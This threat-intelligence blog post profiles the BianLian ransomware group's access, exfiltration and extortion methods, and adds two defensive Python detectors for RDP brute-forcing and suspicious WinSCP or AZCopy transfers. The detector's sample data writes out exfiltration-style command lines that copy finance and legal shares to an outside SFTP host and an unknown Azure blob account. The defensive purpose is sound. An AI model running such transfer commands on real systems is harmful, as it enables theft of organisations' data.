MOXFIVE Threat Actor Spotlight - BianLian

Every month, we take a look at a current ransomware threat actor.

BianLian

BianLian, a ransomware group that emerged in 2022, has rapidly gained notoriety for its highly targeted attacks on critical infrastructure and its exploitation of vulnerabilities to gain initial access. Originally employing encryption-based tactics, BianLian has since shifted its focus to data exfiltration and extortion, relying on the threat of public exposure of sensitive data to coerce organizations into paying large ransoms. This evolution in tactics has allowed BianLian to capitalize on the value of stolen data, making their attacks particularly damaging to organizations across various industries.

The group gains initial access by exploiting vulnerabilities in critical infrastructure and leveraging remote services. After infiltrating the network, BianLian moves laterally, exfiltrating large volumes of sensitive data, often transferring the data to trusted cloud services like Azure Blob Storage. Their ransom demands are tailored to the perceived value of the exfiltrated data and the financial standing of the victim, making BianLian a versatile and highly dangerous threat across multiple industries.

Key Highlights

Targeted Industries: In recent months, BianLian has successfully targeted multiple victims in the Manufacturing, Professional Services, Healthcare, Financial, and Legal sectors. These industries are particularly attractive to BianLian due to the sensitive data they possess, which increases leverage in extortion attempts.

Ransomware Payment Demands: BianLian's ransom demands are based on their perceived value of the data exfiltrated. Their ransom notes typically include detailed information regarding the victim’s revenue, the volume of data stolen, and a description of the data itself. This information allows BianLian to tailor their demands according to what they believe the data is worth to the victim, often pressuring organizations to pay to avoid public exposure of sensitive information.

Notable Leveraged Exploits:
BianLian has recently been observed brute-forcing externally facing Remote Desktop Protocol (RDP) systems and exploiting VPN vulnerabilities in SonicWall and Fortinet products. These tactics provide them with access to critical networks and have been particularly effective in the past few months. Additionally, the group has used tools like NLBrute, a well-known RDP attack tool, to automate brute-force attempts, further enhancing their ability to gain unauthorized access to remote systems.
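The brute-force activity described above leaves a recognisable trail in the Windows Security log: a burst of failed logons (event 4625) from one external address against several account names, sometimes followed by a successful logon (event 4624) from that same address. The detection below is an added example written for this spotlight, not MOXFIVE tooling. It assumes the events have already been exported as dictionaries with the fields shown; the sample records, addresses and account names are constructed.

```python
"""Flag bursts of failed RDP logons followed by a success from the same source.

Added example for this spotlight (not MOXFIVE's tooling). It assumes Windows
Security events have already been exported as dicts with the fields used below;
the sample records are constructed.
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample: six failed logons in a few seconds from 203.0.113.10
# against several account names, then a successful logon from that address.
# 198.51.100.7 is ordinary user behaviour (one mistyped password, then success).
SAMPLE_EVENTS = [
    {"time": "2024-09-01T02:00:00", "event_id": 4625, "logon_type": 10, "user": "administrator", "src_ip": "203.0.113.10"},
    {"time": "2024-09-01T02:00:01", "event_id": 4625, "logon_type": 10, "user": "admin", "src_ip": "203.0.113.10"},
    {"time": "2024-09-01T02:00:02", "event_id": 4625, "logon_type": 10, "user": "administrator", "src_ip": "203.0.113.10"},
    {"time": "2024-09-01T02:00:03", "event_id": 4625, "logon_type": 3, "user": "backup", "src_ip": "203.0.113.10"},
    {"time": "2024-09-01T02:00:04", "event_id": 4625, "logon_type": 3, "user": "sqlsvc", "src_ip": "203.0.113.10"},
    {"time": "2024-09-01T02:00:05", "event_id": 4625, "logon_type": 10, "user": "jsmith", "src_ip": "203.0.113.10"},
    {"time": "2024-09-01T02:00:09", "event_id": 4624, "logon_type": 10, "user": "jsmith", "src_ip": "203.0.113.10"},
    {"time": "2024-09-01T02:05:00", "event_id": 4625, "logon_type": 10, "user": "jdoe", "src_ip": "198.51.100.7"},
    {"time": "2024-09-01T02:05:30", "event_id": 4624, "logon_type": 10, "user": "jdoe", "src_ip": "198.51.100.7"},
]

# Logon type 10 is RemoteInteractive (RDP). On hosts with Network Level
# Authentication enabled, failed RDP logons are commonly recorded with logon
# type 3 instead, so both types are counted.
RDP_LOGON_TYPES = {3, 10}


def detect_rdp_bruteforce(events, threshold=5, window_seconds=300):
    """Return one finding per source IP that produced at least `threshold`
    failed logons (event 4625) inside a sliding window of `window_seconds`.
    A later successful logon (event 4624) from the same IP is recorded in the
    finding; that is the case that warrants isolating the host immediately."""
    events = sorted(events, key=lambda e: e["time"])
    recent_failures = defaultdict(list)  # src_ip -> [(timestamp, username), ...]
    findings = {}
    for e in events:
        if e["logon_type"] not in RDP_LOGON_TYPES:
            continue
        ts = datetime.fromisoformat(e["time"])
        ip = e["src_ip"]
        if e["event_id"] == 4625:
            recent_failures[ip].append((ts, e["user"]))
            # Keep only the failures that fall inside the sliding window
            recent_failures[ip] = [
                (t, u) for t, u in recent_failures[ip]
                if (ts - t).total_seconds() <= window_seconds
            ]
            if len(recent_failures[ip]) < threshold:
                continue
            if ip not in findings:
                findings[ip] = {
                    "src_ip": ip,
                    "first_seen": recent_failures[ip][0][0].isoformat(),
                    "failed_attempts": 0,
                    "usernames": set(),
                    "success_after_burst": None,
                }
            findings[ip]["failed_attempts"] = len(recent_failures[ip])
            findings[ip]["usernames"] = {u for _, u in recent_failures[ip]}
        elif e["event_id"] == 4624 and ip in findings:
            # Success from an address that just burst: probable compromised account
            findings[ip]["success_after_burst"] = e["user"]
    for f in findings.values():
        f["usernames"] = sorted(f["usernames"])
    return list(findings.values())


if __name__ == "__main__":
    for finding in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(finding)
```

The window and threshold are deliberately parameters: a slow spray spaced wider than the window will not trip the rule, which is the usual trade-off against alert noise from users who mistype a password a few times. Tuning those two values against the organisation's own 4625 baseline matters more than the specific numbers shown here.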

BianLian has also exploited vulnerabilities in TeamCity, a platform widely used for Continuous Integration and Continuous Delivery (CI/CD). CI/CD automates the process of developing, testing, and deploying software, allowing companies to release updates faster. These vulnerabilities, including authentication bypass flaws, have assisted the group in gaining initial access to critical infrastructure.

Data Exfiltration:
BianLian is known for its versatility in how it exfiltrates data, employing a wide range of methods depending on the environment. The group adapts to the tools and infrastructure available within the compromised network, making them a highly flexible and stealthy threat actor.

One notable tactic involves using tools already present in the victim's environment. For instance, if they find WinSCP installed on a server, they will leverage it to exfiltrate data instead of introducing new tools, reducing the likelihood of detection.

MOXFIVE has observed BianLian gaining access to networks through compromised Managed Service Providers (MSPs) using Remote Monitoring and Management (RMM) tools. After gaining access to the network, BianLian targets domain controllers and file servers to exfiltrate sensitive data. They gather data from various systems, including shared folders and SQL databases, and use the stolen information to pressure executives by directly contacting them via email and text messages.

In other instances, BianLian’s tactics have pivoted to using trusted cloud services like Azure Blob Storage to transfer stolen data quickly and discreetly. Their ability to blend exfiltration traffic with legitimate cloud activities, combined with tools like AZCopy, makes it difficult for organizations to detect and block data theft in real time.
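Both exfiltration patterns above, reusing a WinSCP install already on a server and pushing data to Azure Blob Storage with AZCopy, share one detectable property: a legitimate transfer tool pointed at a destination the organisation does not own. The example below is added for this spotlight and is not MOXFIVE detection content. It assumes process-creation records in the shape of Sysmon event 1 (image path, command line, user) and proxy or firewall flow records with byte counts; the allow-list of storage accounts, hostnames, paths and the sample events are all constructed.

```python
"""Flag WinSCP and AZCopy launches whose destination is outside the organisation,
plus large uploads to Azure Blob endpoints that are not on the allow-list.

Added example for this spotlight (not MOXFIVE's detection content). Process
records are shaped like Sysmon process-creation events; network records are
shaped like proxy/firewall flow logs with byte counts. All values are constructed.
"""
import re

# Constructed allow-list: storage accounts the organisation legitimately uses.
KNOWN_STORAGE_ACCOUNTS = {"corpbuilds.blob.core.windows.net"}

# Transfer tools the spotlight reports BianLian reusing when already present.
TRANSFER_TOOLS = {"winscp.exe", "azcopy.exe"}

BLOB_HOST_RE = re.compile(r"https?://([a-z0-9-]+\.blob\.core\.windows\.net)", re.I)
SFTP_HOST_RE = re.compile(r'sftp://(?:[^@/\s]+@)?([^/\s"]+)', re.I)

PROCESS_EVENTS = [
    {"host": "FS01", "user": r"CORP\svc_backup",
     "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": r'"C:\Program Files (x86)\WinSCP\WinSCP.exe" /command "open sftp://svc@203.0.113.50/" "put D:\Shares\Finance\*" "exit"'},
    {"host": "FS01", "user": r"CORP\administrator",
     "image": r"C:\Tools\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Shares\Legal" "https://exfilstore.blob.core.windows.net/c1?sv=2022-11-02&sig=REDACTED" --recursive'},
    {"host": "WS22", "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"host": "BUILD01", "user": r"CORP\svc_ci",
     "image": r"C:\Tools\azcopy.exe",
     "cmdline": r'azcopy.exe copy "C:\artifacts" "https://corpbuilds.blob.core.windows.net/drop" --recursive'},
]

NETWORK_EVENTS = [
    {"host": "FS01", "dest_host": "exfilstore.blob.core.windows.net", "dest_port": 443, "bytes_out": 48_000_000_000},
    {"host": "BUILD01", "dest_host": "corpbuilds.blob.core.windows.net", "dest_port": 443, "bytes_out": 3_500_000_000},
    {"host": "WS22", "dest_host": "outlook.office365.com", "dest_port": 443, "bytes_out": 2_000_000},
]


def classify_process(event):
    """Return a finding when a known transfer tool is pointed at a destination
    that is not on the allow-list; otherwise None (baseline activity)."""
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    if image_name not in TRANSFER_TOOLS:
        return None
    cmdline = event["cmdline"]
    destinations = [m.group(1).lower() for m in BLOB_HOST_RE.finditer(cmdline)]
    destinations += [m.group(1).lower() for m in SFTP_HOST_RE.finditer(cmdline)]
    unknown = [d for d in destinations if d not in KNOWN_STORAGE_ACCOUNTS]
    if not unknown:
        return None
    return {
        "host": event["host"],
        "user": event["user"],
        "tool": image_name,
        "destinations": unknown,
        # "sig=" marks an Azure shared access signature on the command line:
        # the upload was authorised by a bearer token, not a signed-in identity.
        "uses_sas_token": "sig=" in cmdline.lower(),
    }


def large_uploads_to_unknown_blobs(network_events, min_bytes=1_000_000_000):
    """Return flows that pushed at least `min_bytes` to a Blob endpoint not on
    the allow-list. Volume is the signal a renamed tool cannot hide."""
    hits = []
    for e in network_events:
        dest = e["dest_host"].lower()
        if (dest.endswith(".blob.core.windows.net")
                and dest not in KNOWN_STORAGE_ACCOUNTS
                and e["bytes_out"] >= min_bytes):
            hits.append(e)
    return hits


def hunt(process_events, network_events):
    """Combine both signals into one report keyed by host."""
    report = {}
    for e in process_events:
        finding = classify_process(e)
        if finding:
            report.setdefault(finding["host"], {"tools": [], "large_uploads": []})["tools"].append(finding)
    for e in large_uploads_to_unknown_blobs(network_events):
        report.setdefault(e["host"], {"tools": [], "large_uploads": []})["large_uploads"].append(e)
    return report


if __name__ == "__main__":
    for host, signals in hunt(PROCESS_EVENTS, NETWORK_EVENTS).items():
        print(host, signals)
```

The allow-list is the part that does the work: AZCopy and WinSCP are ordinary administrative tools, so alerting on the binaries alone produces noise, while a transfer to a storage account or SFTP host nobody in the organisation recognises is actionable on its own. Because the command-line check depends on process logging being enabled on file servers, the byte-count rule over egress logs is kept as an independent second signal for the case where the tool has been renamed or the command line was not captured.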

If you would like to know more or need assistance with incident response efforts, please contact us at 833-568-6695 or email our team at [email protected].